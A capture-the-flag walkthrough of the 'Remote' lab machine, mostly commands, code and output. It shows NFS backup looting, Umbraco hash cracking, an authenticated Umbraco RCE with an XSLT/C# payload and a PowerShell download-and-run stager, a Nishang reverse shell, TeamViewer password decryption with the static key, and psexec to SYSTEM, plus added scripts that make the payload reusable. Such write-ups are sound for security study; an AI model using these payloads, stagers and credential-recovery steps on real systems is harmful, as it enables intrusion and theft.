Remote

Enumeration
As usual, we start with an nmap scan to find the open ports on the target machine.
The following nmap command scans the whole port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.180 -oN allPorts
-sS: use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Thu Mar 17 20:30:07 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.31s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
445/tcp open microsoft-ds
2049/tcp open nfs
49666/tcp open unknown
# Nmap done at Thu Mar 17 20:30:34 2022 -- 1 IP address (1 host up) scanned in 26.91 seconds
As we can see, quite a few ports are open. Let's obtain more information about the services and versions running on them.
nmap -sC -sV -p21,80,111,135,445,2049,49666 10.10.10.180 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Mar 17 20:34:10 2022 as: nmap -sCV -p21,80,111,135,445,2049,49666 -Pn -oN targeted 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
49666/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-17T19:35:10
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 17 20:36:19 2022 -- 1 IP address (1 host up) scanned in 128.70 seconds
Let's take a look at the website.

Not much going on. Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
dir: enumerate directories or files.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.180
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404,500
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/18 15:30:01 Starting gobuster in directory enumeration mode
===============================================================
/blog (Status: 200) [Size: 5001]
/products (Status: 200) [Size: 5328]
/contact (Status: 200) [Size: 7880]
/home (Status: 200) [Size: 6703]
/people (Status: 200) [Size: 6739]
/Home (Status: 200) [Size: 6703]
/Products (Status: 200) [Size: 5338]
/Contact (Status: 200) [Size: 7890]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/Blog (Status: 200) [Size: 5011]
/about-us (Status: 200) [Size: 5451]
/People (Status: 200) [Size: 6749]
/INSTALL (Status: 302) [Size: 126]
===============================================================
2022/03/18 15:33:47 Finished
===============================================================
If we take a look at the /install directory, which redirects to /umbraco/, we'll see a login page. The redirect is itself a fingerprint: the site runs the Umbraco CMS.

If we search for Umbraco exploits with the searchsploit tool, we'll see that there is one which allows us to execute commands remotely, but it is an authenticated exploit, so we need valid back-office credentials to use it.
searchsploit umbraco
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Nmap reported that port 2049 is open. This is the default port for NFS (Network File System), and the rpcinfo output from port 111 listed nfs and mountd among the registered programs. Let's see whether the server exports anything.
showmount -e 10.10.10.180
-e: show the NFS server's export list.
Export list for 10.10.10.180:
/site_backups (everyone)
The export is readable by everyone, so any host that can reach port 2049 can pull the site backup without credentials. Let's create a directory on which to mount it.
mkdir nfs
Now let's mount the export on that folder (mounting needs root, so use sudo if you are not root):
mount -t nfs 10.10.10.180:/site_backups nfs/
-t: the filesystem type to mount, nfs here.
If we take a look at the nfs folder, we'll see the directory layout of an ASP.NET site, with the Umbraco folders alongside Web.config.
ls -ll nfs/
total 115
drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 2020 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Media
drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 2020 Web.config
If we look inside the App_Data folder, we'll find the Umbraco.sdf file.
ls -ll nfs/App_Data
total 1969
drwx------ 2 nobody 4294967294 64 Feb 20 2020 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Models
drwx------ 2 nobody 4294967294 64 Feb 20 2020 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 TEMP
-rwx------ 1 nobody 4294967294 36832 Feb 20 2020 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20 2020 Umbraco.sdf
We can see that it is a binary file: the .sdf extension is a SQL Server Compact database, the embedded database Umbraco 7 uses by default, so the user table is inside it.
cat nfs/App_Data/Umbraco.sdf
File: nfs/App_Data/Umbraco.sdf <BINARY>
If we search for admin in the file with the strings tool, we'll find a user record with an email and a SHA1 password hash. strings runs the row's fields together, so the login (admin) and the email (admin@htb.local) appear concatenated:
strings nfs/App_Data/Umbraco.sdf | grep admin
[...]
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
[...]
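The same record can be parsed and checked offline instead of pasting the hash into a web service. The script below is an added example and not part of the original write-up: it picks user records out of `strings` output by anchoring on the 40-hex-digit hash followed by the `{"hashAlgorithm":...}` JSON (the only unambiguous boundary in the concatenated row), and tests wordlist candidates with the named algorithm as an unsalted digest. The sample line is the one shown above; the wordlist is constructed.

```python
"""Parse Umbraco user records out of `strings Umbraco.sdf` output and test
candidate passwords offline. Added example; not the write-up's own tooling.
The sample line is the one the page shows; the wordlist is constructed."""
import hashlib
import re
from typing import Dict, Iterable, List, Optional

# `strings` prints a user row as one run of fields with the separators lost:
#   <login><email><hash>{"hashAlgorithm":"<alg>"}<email><lang>...
# The hash is unambiguous (40 hex chars directly followed by the JSON config);
# the login/email boundary is not, so it is returned as one string for the
# analyst to split.
RECORD_RE = re.compile(
    r'(?P<prefix>.*?)(?P<hash>[0-9a-fA-F]{40})\{"hashAlgorithm":"(?P<alg>[^"]+)"\}'
)

# The line the page obtained from `strings nfs/App_Data/Umbraco.sdf | grep admin`
SAMPLE = (
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa'
    '{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50'
)


def parse_records(strings_output: str) -> List[Dict[str, str]]:
    """Return one dict per user record found in the strings output."""
    records = []
    for line in strings_output.splitlines():
        for m in RECORD_RE.finditer(line):
            records.append({
                "login_and_email": m.group("prefix"),
                "hash": m.group("hash").lower(),
                "alg": m.group("alg"),
            })
    return records


def hash_candidate(password: str, alg: str) -> str:
    """Unsalted hex digest of the password with the record's algorithm.
    Raises ValueError for algorithm names hashlib does not know."""
    try:
        h = hashlib.new(alg.lower())
    except ValueError:
        raise ValueError(f"unsupported hashAlgorithm {alg!r}") from None
    h.update(password.encode("utf-8"))
    return h.hexdigest()


def crack(record: Dict[str, str], wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose digest matches the record's hash."""
    for word in wordlist:
        if hash_candidate(word, record["alg"]) == record["hash"]:
            return word
    return None


if __name__ == "__main__":
    wordlist = ["password", "admin", "baconandcheese"]  # constructed list
    for rec in parse_records(SAMPLE):
        print(rec["login_and_email"], rec["alg"], rec["hash"])
        print("match:", crack(rec, wordlist))
```

Only unsalted digests are handled here, which is exactly the class of hash crackstation can look up; a salted or HMAC-based Umbraco configuration would need the scheme's own construction.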
Let's see if we can get the password for that hash with crackstation (it only looks up unsalted hashes, so a hit also tells us the stored value is a plain SHA1 of the password).

And we get the baconandcheese password. Now that we have valid credentials, we can use the authenticated exploit we found earlier with searchsploit.
searchsploit -m aspx/webapps/46153.py
Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46153
Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable
Copied to: /home/alfa8sa/HTB/machines/remote/46153.py
Before executing it, we have to change a few things. First we set the login variable to admin@htb.local, the password variable to baconandcheese, and the host variable to http://10.10.10.180 (remember that the login and the email were run together in the strings output; the login used here is the email address).
nano 46153.py
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";
Then we change the payload variable so that it sends us back a reverse shell. First, copy Invoke-PowerShellTcp.ps1 from Nishang (installed here under /opt/nishang) to the current directory:
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
Then open it and append the following line at the end of the file, so the function is called as soon as the script is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 4444
Serve the current directory over HTTP with python:
python -m http.server 80
Back in the exploit, change the payload so that the C# code spawns cmd.exe, which runs powershell, which downloads rev.ps1 and executes it in memory. The closing double quote after the URL is easy to lose when editing this one-liner:
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.19/rev.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
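Hand-editing that one-liner breaks as soon as the command contains a double quote, a pipe, a redirect or an && chain, because the command sits inside a C# string literal which in turn sits inside XML element text. The script below is an added example, not the exploit author's code: it builds the same stylesheet for an arbitrary command, escaping it for both layers, and parses the result back to prove it is well-formed. The attacker address is the one used on this page; `powershell_stager` is a helper added here.

```python
"""Build the XSLT/C# payload that the Umbraco 7.12.4 authenticated RCE
(exploit-db 46153) posts to the server, for an arbitrary command.
Added example, not the exploit author's code."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
from typing import Dict

NS: Dict[str, str] = {
    "xsl": "http://www.w3.org/1999/XSL/Transform",
    "msxsl": "urn:schemas-microsoft-com:xslt",
    "csharp_user": "http://csharp.mycompany.com/mynamespace",
}


def csharp_literal(s: str) -> str:
    """Escape a value so it can sit inside a C# "..." string literal."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_payload(command: str) -> str:
    """Return an XSLT stylesheet whose embedded C# runs `cmd.exe /c <command>`
    and returns its stdout, the same shape as the exploit's payload."""
    script = (
        "public string xml() { "
        'string cmd = "/c ' + csharp_literal(command) + '"; '
        "System.Diagnostics.Process proc = new System.Diagnostics.Process(); "
        'proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd; '
        "proc.StartInfo.UseShellExecute = false; "
        "proc.StartInfo.RedirectStandardOutput = true; "
        "proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }"
    )
    head = (
        '<?xml version="1.0"?>'
        '<xsl:stylesheet version="1.0" xmlns:xsl="%s" xmlns:msxsl="%s" '
        'xmlns:csharp_user="%s">' % (NS["xsl"], NS["msxsl"], NS["csharp_user"])
    )
    tail = (
        "</msxsl:script>"
        '<xsl:template match="/"><xsl:value-of select="csharp_user:xml()"/></xsl:template>'
        "</xsl:stylesheet>"
    )
    # The C# lives in XML element text: '&', '<' and '>' in a command (pipes,
    # redirects, && chains) must be entity-escaped, or the server rejects the
    # stylesheet as malformed before anything executes.
    return head + '<msxsl:script language="C#" implements-prefix="csharp_user">' \
        + escape(script) + tail


def embedded_script(payload: str) -> str:
    """Parse the payload back as XML and return the C# body.
    Raises xml.etree.ElementTree.ParseError if the escaping was wrong."""
    root = ET.fromstring(payload)
    return root.find("msxsl:script", NS).text


def powershell_stager(lhost: str, script: str = "rev.ps1") -> str:
    """The download-and-run one-liner from the page, parameterised on the
    attacker host (lhost is supplied by the caller)."""
    return ("powershell IEX(New-Object Net.WebClient)"
            f".downloadString('http://{lhost}/{script}')")


if __name__ == "__main__":
    payload = build_payload(powershell_stager("10.10.14.19"))
    print(payload)
    print(embedded_script(payload))
```

The round trip through `embedded_script` is the check worth keeping: if the parser raises, the server would have returned an error rather than a shell, and the bug is in the payload, not in the credentials.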
Finally, let's set a netcat listener on port 4444 (rlwrap gives the non-interactive shell line editing and history):
rlwrap nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP addresses, no DNS resolution.
-p: the port to listen on.
Now, if we execute the python script, we get a reverse shell as the iis apppool\defaultapppool user (the identity of the w3wp.exe worker process that hosts the site), and we can grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.180] 49703
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
type \users\public\user.txt
6d0c411c9accbbe995751f83645e54d1
Privilege Escalation
If we list the processes running on the machine, we'll see that a TeamViewer service is running.
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
Registry 88 0 20,108 K
smss.exe 292 0 1,244 K
csrss.exe 372 0 5,208 K
wininit.exe 480 0 6,856 K
csrss.exe 496 1 4,712 K
winlogon.exe 544 1 16,440 K
services.exe 612 0 7,880 K
lsass.exe 632 0 13,672 K
svchost.exe 732 0 13,660 K
fontdrvhost.exe 752 0 3,908 K
fontdrvhost.exe 760 1 4,200 K
svchost.exe 844 0 9,896 K
dwm.exe 936 1 37,272 K
svchost.exe 972 0 59,996 K
svchost.exe 312 0 15,084 K
svchost.exe 316 0 17,164 K
svchost.exe 364 0 16,912 K
svchost.exe 1036 0 19,164 K
svchost.exe 1120 0 22,272 K
vm3dservice.exe 1236 0 6,548 K
svchost.exe 1440 0 8,696 K
svchost.exe 1580 0 16,796 K
spoolsv.exe 1596 0 16,248 K
svchost.exe 1804 0 10,652 K
svchost.exe 2060 0 26,804 K
svchost.exe 2080 0 11,784 K
inetinfo.exe 2104 0 15,192 K
svchost.exe 2164 0 8,288 K
TeamViewer_Service.exe 2228 0 19,268 K
VGAuthService.exe 2256 0 10,548 K
vmtoolsd.exe 2280 0 17,692 K
svchost.exe 2296 0 7,372 K
svchost.exe 2312 0 12,276 K
MsMpEng.exe 2404 0 170,252 K
nfssvc.exe 2412 0 5,264 K
svchost.exe 2536 0 12,124 K
dllhost.exe 3132 0 13,384 K
WmiPrvSE.exe 3264 0 18,532 K
LogonUI.exe 3468 1 45,868 K
msdtc.exe 3536 0 10,156 K
SearchIndexer.exe 4204 0 18,212 K
svchost.exe 776 0 12,864 K
w3wp.exe 1372 0 298,748 K
svchost.exe 4992 0 6,204 K
cmd.exe 472 0 3,712 K
conhost.exe 2132 0 12,272 K
powershell.exe 4084 0 126,344 K
tasklist.exe 2684 0 7,588 K
If we look in the C:\Program Files (x86)\TeamViewer directory, we'll see that it is version 7.
dir \progra~2\TeamViewer
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2020 10:35 AM Version7
There is a Metasploit post module (post/windows/gather/credentials/teamviewer_passwords) that recovers TeamViewer passwords. It does not crack anything: TeamViewer 7 stores the password AES-encrypted with a key and IV that are identical on every installation, so anyone who can read the value can decrypt it. The value lives in the HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7 registry key, in the SecurityPasswordAES property.
(Get-ItemProperty HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91
As I don't like to use Metasploit, I made a small python script that decrypts this value with the well-known key and IV and gives us the password (it needs pycryptodome).
from Crypto.Cipher import AES  # pip install pycryptodome

# Static key and IV shared by every TeamViewer install (CVE-2019-18988):
# the stored value is reversible, so this is a decryption, not a crack.
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

# The SecurityPasswordAES bytes as printed by Get-ItemProperty above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 19, 27, 70, 79,
                    88, 47, 108, 226, 209, 225, 243, 218, 126, 141, 55, 107, 38, 57, 78, 91])

decipher = AES.new(key, AES.MODE_CBC, iv)
# TeamViewer stores the password as UTF-16LE, zero-padded to the block size;
# decoding it as UTF-8 only looks right because the terminal hides the NUL bytes.
plaintext = decipher.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")
print(plaintext)
If we execute it, we get the !R3m0te! password.
python passwd.py
!R3m0te!
Now we can check with crackmapexec whether the TeamViewer password is reused for the local Administrator account.
crackmapexec smb 10.10.10.180 -u 'Administrator' -p "\!R3m0te\!"
SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB 10.10.10.180 445 REMOTE [+] remote\Administrator:!R3m0te! (Pwn3d!)
And the password is valid: Pwn3d! means the account has administrative access over SMB. Finally, let's get a shell as the nt authority\system user with psexec. Note what it leaves behind, visible in the output: a randomly named binary uploaded to ADMIN$ and a newly created service, both easy to alert on. Then all we have to do is reap the harvest and take the root flag.
impacket-psexec Administrator:"\!R3m0te\!"@10.10.10.180
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file SliGWDPW.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service gnjn on 10.10.10.180.....
[*] Starting service gnjn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type \users\administrator\desktop\root.txt
f5f08ce4e749219167bb2e08abe2283b